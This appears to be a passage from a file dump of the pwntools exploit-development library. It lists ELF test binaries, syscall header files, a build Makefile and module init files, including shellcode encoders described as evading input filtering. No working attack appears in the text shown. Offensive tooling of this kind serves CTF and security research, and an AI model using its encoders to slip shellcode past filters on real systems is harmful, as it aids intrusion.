https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-big-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-mips-big: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-mips-big -------------------------------------------------------------------------------- /pwnlib/data/elf/test-mips-big-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-mips-big-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-mips-big-pie-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-mips-big-pie-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-mips-big-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-mips-big-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-riscv64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-riscv64 -------------------------------------------------------------------------------- /pwnlib/data/elf/test-riscv64-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-riscv64-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-riscv64-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-riscv64-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-riscv64-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-riscv64-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-big: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-big -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-big-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-big-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-big-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-big-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-big-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-big-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-thumb-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-thumb-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x32 -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x32-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x32-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x32-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x32-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x32-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x32-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x64 -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x64-cfp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x64-cfp -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x64-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x64-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x64-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x64-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x64-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x64-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x86: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x86 -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x86-cfp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x86-cfp -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x86-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x86-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x86-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x86-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-x86-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-x86-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/includes/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/aarch64.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/alpha.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/amd64.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/arm.h: -------------------------------------------------------------------------------- 1 | #define allocate 5 2 | #define SYS_allocate 5 3 | #define __NR_allocate 5 4 | #define deallocate 6 5 | #define SYS_deallocate 6 6 | #define __NR_deallocate 6 7 | #define fdwait 4 8 | #define SYS_fdwait 4 9 | #define __NR_fdwait 4 10 | #define random 7 11 | #define SYS_random 7 12 | #define __NR_random 7 13 | #define receive 3 14 | #define SYS_receive 3 15 | #define __NR_receive 3 16 | #define terminate 1 17 | #define SYS_terminate 1 18 | #define __NR_terminate 1 19 | #define transmit 2 20 | #define SYS_transmit 2 21 | #define __NR_transmit 2 22 | -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/i386.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/ia64.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/mips.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/powerpc.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/powerpc64.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/s390.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/s390x.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/sparc.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/sparc64.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/cgc/thumb.h: -------------------------------------------------------------------------------- 1 | arm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/aarch64.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/alpha.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/amd64.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/arm.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/i386.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/ia64.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/mips.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/powerpc.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/powerpc64.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/s390.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/s390x.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/sparc.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/sparc64.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/freebsd/thumb.h: -------------------------------------------------------------------------------- 1 | ../freebsd.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/common.h: -------------------------------------------------------------------------------- 1 | #define STDIN_FILENO 0 /* standard input file descriptor */ 2 | #define STDOUT_FILENO 1 /* standard output file descriptor */ 3 | #define STDERR_FILENO 2 /* standard error file descriptor */ 4 | 5 | #define __BSD_VISIBLE 99999999 6 | #define __POSIX_VISIBLE 99999999 7 | #define __XSI_VISIBLE 99999999 8 | 9 | #define INADDR_ANY 0 10 | #define INADDR_BROADCAST 0xffffffff 11 | #define INADDR_NONE 0xffffffff 12 | #define INADDR_LOOPBACK 0x7f000001 13 | 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/machine/_align.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/machine/_align.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/machine/_limits.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/machine/_limits.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/machine/signal.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/machine/signal.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/_iovec.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/_iovec.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/_sigset.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/_sigset.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/_sockaddr_storage.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/_sockaddr_storage.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/_timespec.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/_timespec.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/_types.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/_types.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/cdefs.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/cdefs.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/sys/time.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/sys/time.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/freebsd/vm/vm.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/includes/generator/freebsd/vm/vm.h -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/aarch64.h: -------------------------------------------------------------------------------- 1 | #define __arm__ 2 | #define __aarch64__ 3 | #include 4 | #include 5 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/alpha.h: -------------------------------------------------------------------------------- 1 | #define __alpha__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/amd64.h: -------------------------------------------------------------------------------- 1 | #define __x86_64__ 2 | #include 3 | #include 4 | #include 5 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/arm.h: -------------------------------------------------------------------------------- 1 | #define __arm__ 2 | #define __ARM_EABI__ 1 3 | #define __KERNEL__ 1 4 | #include 5 | #include 6 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/common.h: -------------------------------------------------------------------------------- 1 | #define __ASSEMBLER__ 2 | #define MAP_32BIT 0x40 // Only give out 32-bit addresses. 3 | #define INADDR_ANY 0 4 | #define INADDR_BROADCAST 0xffffffff 5 | #define INADDR_NONE 0xffffffff 6 | #define INADDR_LOOPBACK 0x7f000001 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/asm/aarch64-sigcontext.h: -------------------------------------------------------------------------------- 1 | struct sigcontext { 2 | unsigned long fault_address; 3 | /* AArch64 registers */ 4 | unsigned long regs[31]; 5 | unsigned long sp; 6 | unsigned long pc; 7 | unsigned long pstate; 8 | /* 4K reserved for FP/SIMD state and future expansion */ 9 | unsigned char __reserved[4096] __attribute__((__aligned__(16))); 10 | }; 11 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/asm/ia64-sigcontext.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define PC(ctx) (ctx.sc_ip) 4 | 5 | #include 6 | 7 | struct sigcontext { 8 | unsigned long sc_flags; 9 | unsigned long sc_nat; 10 | stack_t sc_stack; 11 | unsigned long sc_ip; 12 | unsigned long sc_cfm; 13 | unsigned long sc_um; 14 | unsigned long sc_ar_rsc; 15 | unsigned long sc_ar_bsp; 16 | unsigned long sc_ar_rnat; 17 | unsigned long sc_ar_ccv; 18 | unsigned long sc_ar_unat; 19 | unsigned long sc_ar_fpsr; 20 | unsigned long sc_ar_pfs; 21 | unsigned long sc_ar_lc; 22 | unsigned long sc_pr; 23 | unsigned long sc_br[8]; 24 | unsigned long sc_gr[32]; 25 | struct ia64_fpreg sc_fr[128]; 26 | sigset_t sc_mask; 27 | }; 28 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/asm/parisc-sigcontext.h: -------------------------------------------------------------------------------- 1 | 2 | #define PARISC_SC_FLAG_ONSTACK 1<<0 3 | #define PARISC_SC_FLAG_IN_SYSCALL 1<<1 4 | 5 | /* We will add more stuff here as it becomes necessary, until we know 6 | it works. */ 7 | struct sigcontext { 8 | unsigned long sc_flags; 9 | 10 | unsigned long sc_gr[32]; /* PSW in sc_gr[0] */ 11 | unsigned long long sc_fr[32]; /* FIXME, do we need other state info? */ 12 | unsigned long sc_iasq[2]; 13 | unsigned long sc_iaoq[2]; 14 | unsigned long sc_sar; /* cr11 */ 15 | }; 16 | 17 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/mips/mips-asm.h: -------------------------------------------------------------------------------- 1 | #ifndef DIET_MIPS_ASM_H 2 | #define DIET_MIPS_ASM_H 3 | 4 | #ifdef __ASSEMBLER__ 5 | #if _MIPS_SIM == _ABI64 6 | 7 | #define PTR_LA dla 8 | #define PTR_SW sd 9 | #define PTR_LL lld 10 | #define PTR_SC scd 11 | #define PTR_LW ld 12 | #define PTR_SLL dsll 13 | #define PTR_ADD dadd 14 | 15 | #else 16 | 17 | #define PTR_LA la 18 | #define PTR_SW sw 19 | #define PTR_LL ll 20 | #define PTR_SC sc 21 | #define PTR_LW lw 22 | #define PTR_SLL sll 23 | #define PTR_ADD add 24 | 25 | #endif 26 | #endif /* __ASSEMBLER__ */ 27 | 28 | #endif /* DIET_MIPS_ASM_H */ 29 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/mips64/syscalls.h: -------------------------------------------------------------------------------- 1 | #include "../mips/syscalls.h" 2 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/mipsel/syscalls.h: -------------------------------------------------------------------------------- 1 | #include "../mips/syscalls.h" 2 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/ppc64le/syscalls.h: -------------------------------------------------------------------------------- 1 | #include "../ppc64/syscalls.h" 2 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/sys/fsuid.h: -------------------------------------------------------------------------------- 1 | #ifndef __FSUID_H 2 | #define __FSUID_H 1 3 | 4 | #include 5 | 6 | __BEGIN_DECLS 7 | 8 | /* Linux only: */ 9 | int setfsuid(uid_t uid); 10 | int setfsgid(gid_t gid); 11 | int setfsuid32(uid32_t fsuid) __THROW; 12 | int setfsgid32(gid32_t fsgid) __THROW; 13 | 14 | __END_DECLS 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/diet/sys/uio.h: -------------------------------------------------------------------------------- 1 | #ifndef _SYS_UIO 2 | #define _SYS_UIO 1 3 | 4 | #include 5 | 6 | __BEGIN_DECLS 7 | 8 | struct iovec { 9 | void* iov_base; /* BSD uses caddr_t (1003.1g requires void *) */ 10 | size_t iov_len; /* Must be size_t (1003.1g) */ 11 | }; 12 | 13 | /* I have no idea why susv3 specifies count as int instead of size_t */ 14 | ssize_t readv(int filedes, const struct iovec *vector, int count) __THROW; 15 | ssize_t writev(int filedes, const struct iovec *vector, int count) __THROW; 16 | 17 | ssize_t preadv(int fd, const struct iovec *iov, int iovcnt, off_t offset) __THROW; 18 | ssize_t pwritev(int fd, const struct iovec *iov, int iovcnt, off_t offset) __THROW; 19 | 20 | __END_DECLS 21 | 22 | #endif 23 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/ia64.h: -------------------------------------------------------------------------------- 1 | #define __ia64__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/loongarch64.h: -------------------------------------------------------------------------------- 1 | // https://git.musl-libc.org/cgit/musl/plain/arch/loongarch64/bits/syscall.h.in 2 | #define __loongarch64 3 | #include 4 | #include 5 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/mips.h: -------------------------------------------------------------------------------- 1 | #define __mips__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/powerpc.h: -------------------------------------------------------------------------------- 1 | #define __ppc__ 2 | #include 3 | #include 4 | 5 | #define r0 0 6 | #define r1 1 7 | #define r2 2 8 | #define r3 3 9 | #define r4 4 10 | #define r5 5 11 | #define r6 6 12 | #define r7 7 13 | #define r8 8 14 | #define r9 9 15 | #define r10 10 16 | #define r11 11 17 | #define r12 12 18 | #define r13 13 19 | #define r14 14 20 | #define r15 15 21 | #define r16 16 22 | #define r17 17 23 | #define r18 18 24 | #define r19 19 25 | #define r20 20 26 | #define r21 21 27 | #define r22 22 28 | #define r23 23 29 | #define r24 24 30 | #define r25 25 31 | #define r26 26 32 | #define r27 27 33 | #define r28 28 34 | #define r29 29 35 | #define r30 30 36 | #define r31 31 37 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/powerpc64.h: -------------------------------------------------------------------------------- 1 | #define __ppc64__ 2 | #include 3 | #include 4 | 5 | #define r0 0 6 | #define r1 1 7 | #define r2 2 8 | #define r3 3 9 | #define r4 4 10 | #define r5 5 11 | #define r6 6 12 | #define r7 7 13 | #define r8 8 14 | #define r9 9 15 | #define r10 10 16 | #define r11 11 17 | #define r12 12 18 | #define r13 13 19 | #define r14 14 20 | #define r15 15 21 | #define r16 16 22 | #define r17 17 23 | #define r18 18 24 | #define r19 19 25 | #define r20 20 26 | #define r21 21 27 | #define r22 22 28 | #define r23 23 29 | #define r24 24 30 | #define r25 25 31 | #define r26 26 32 | #define r27 27 33 | #define r28 28 34 | #define r29 29 35 | #define r30 30 36 | #define r31 31 37 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/riscv64.h: -------------------------------------------------------------------------------- 1 | // https://git.musl-libc.org/cgit/musl/plain/arch/riscv64/bits/syscall.h.in 2 | #define __riscv64__ 3 | #include 4 | #include 5 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/s390.h: -------------------------------------------------------------------------------- 1 | #define __s390__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/s390x.h: -------------------------------------------------------------------------------- 1 | #define __s390x__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/sparc.h: -------------------------------------------------------------------------------- 1 | #define __sparc__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/sparc64.h: -------------------------------------------------------------------------------- 1 | #define __sparc64__ 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /pwnlib/data/includes/generator/linux/thumb.h: -------------------------------------------------------------------------------- 1 | #define __arm__ 2 | #define __thumb__ 3 | #include 4 | #include 5 | -------------------------------------------------------------------------------- /pwnlib/data/syscalls/Makefile: -------------------------------------------------------------------------------- 1 | ROOT=$(shell git rev-parse --show-toplevel) 2 | 3 | all: generate.py functions.py 4 | python generate.py "$(ROOT)/pwnlib/shellcraft/templates/common/linux/syscalls" 5 | 6 | functions.py: 7 | wget https://raw.githubusercontent.com/zachriggle/functions/master/functions.py 8 | 9 | generate_darwin: 10 | python3 generate_darwin.py "$(ROOT)" 11 | 12 | .phony: all 13 | -------------------------------------------------------------------------------- /pwnlib/data/useragents/LICENSE.txt: -------------------------------------------------------------------------------- 1 | This directory contains a script `download-useragents.py' which downloads a 2 | list of user agent strings from the Internet. 3 | 4 | The user agent strings are downloaded from: 5 | - http://www.user-agents.org 6 | - http://techpatterns.com/downloads/firefox/useragentswitcher.xml 7 | 8 | The latter list is part of the Firefox `User Agent Switcher' add-on and 9 | released under BSD 2 Clause. 10 | 11 | 12 | As mentioned elsewhere we are not lawyers and do not know the legal status of 13 | these lists. To the extend that we can legally do so, we redistribute 14 | everything under an MIT license, but otherwise we allow it under the licenses 15 | the lists were originally made available under. 16 | -------------------------------------------------------------------------------- /pwnlib/device.py: -------------------------------------------------------------------------------- 1 | 2 | class Device(object): 3 | arch = None 4 | bits = None 5 | endian = None 6 | serial = None 7 | os = None 8 | 9 | def __init__(self, serial=None): 10 | self.serial = serial 11 | 12 | def __str__(self): 13 | return self.serial 14 | 15 | def __eq__(self, other): 16 | return self.serial == other or self.serial == str(other) 17 | -------------------------------------------------------------------------------- /pwnlib/elf/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Most exploitable CTF challenges are provided in the Executable and Linkable 3 | Format (``ELF``). Generally, it is very useful to be able to interact with 4 | these files to extract data such as function addresses, ROP gadgets, and 5 | writable page addresses. 6 | """ 7 | from __future__ import absolute_import 8 | 9 | from pwnlib.elf.corefile import Core 10 | from pwnlib.elf.datatypes import * 11 | from pwnlib.elf.elf import ELF 12 | from pwnlib.elf.elf import load 13 | from pwnlib.elf import maps 14 | from pwnlib.elf import plt 15 | 16 | __all__ = ['load', 'ELF', 'Core'] + sorted(filter(lambda x: not x.startswith('_'), datatypes.__dict__.keys())) 17 | -------------------------------------------------------------------------------- /pwnlib/encoders/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | """ 3 | Encode shellcode to avoid input filtering and impress your friends! 4 | """ 5 | from __future__ import absolute_import 6 | 7 | from pwnlib.encoders import amd64 8 | from pwnlib.encoders import arm 9 | from pwnlib.encoders import i386 10 | from pwnlib.encoders import mips 11 | from pwnlib.encoders.encoder import Encoder 12 | from pwnlib.encoders.encoder import alphanumeric 13 | from pwnlib.encoders.encoder import encode 14 | from pwnlib.encoders.encoder import line 15 | from pwnlib.encoders.encoder import null 16 | from pwnlib.encoders.encoder import printable 17 | from pwnlib.encoders.encoder import scramble 18 | -------------------------------------------------------------------------------- /pwnlib/encoders/amd64/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from pwnlib.encoders.amd64 import delta 4 | -------------------------------------------------------------------------------- /pwnlib/encoders/arm/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from pwnlib.encoders.arm import alphanumeric 4 | from pwnlib.encoders.arm import xor 5 | -------------------------------------------------------------------------------- /pwnlib/encoders/arm/alphanumeric/alphanumeric.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/encoders/arm/alphanumeric/alphanumeric.py -------------------------------------------------------------------------------- /pwnlib/encoders/i386/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from pwnlib.encoders.i386 import ascii_shellcode 4 | from pwnlib.encoders.i386 import delta 5 | from pwnlib.encoders.i386 import xor 6 | -------------------------------------------------------------------------------- /pwnlib/encoders/mips/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from pwnlib.encoders.mips import xor 4 | -------------------------------------------------------------------------------- /pwnlib/filesystem/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Handles file abstraction for local vs. remote (via ssh) 4 | """ 5 | from pwnlib.filesystem.path import Path 6 | from pwnlib.filesystem.ssh import SSHPath 7 | 8 | __all__ = ['SSHPath', 'Path'] 9 | -------------------------------------------------------------------------------- /pwnlib/filesystem/path.py: 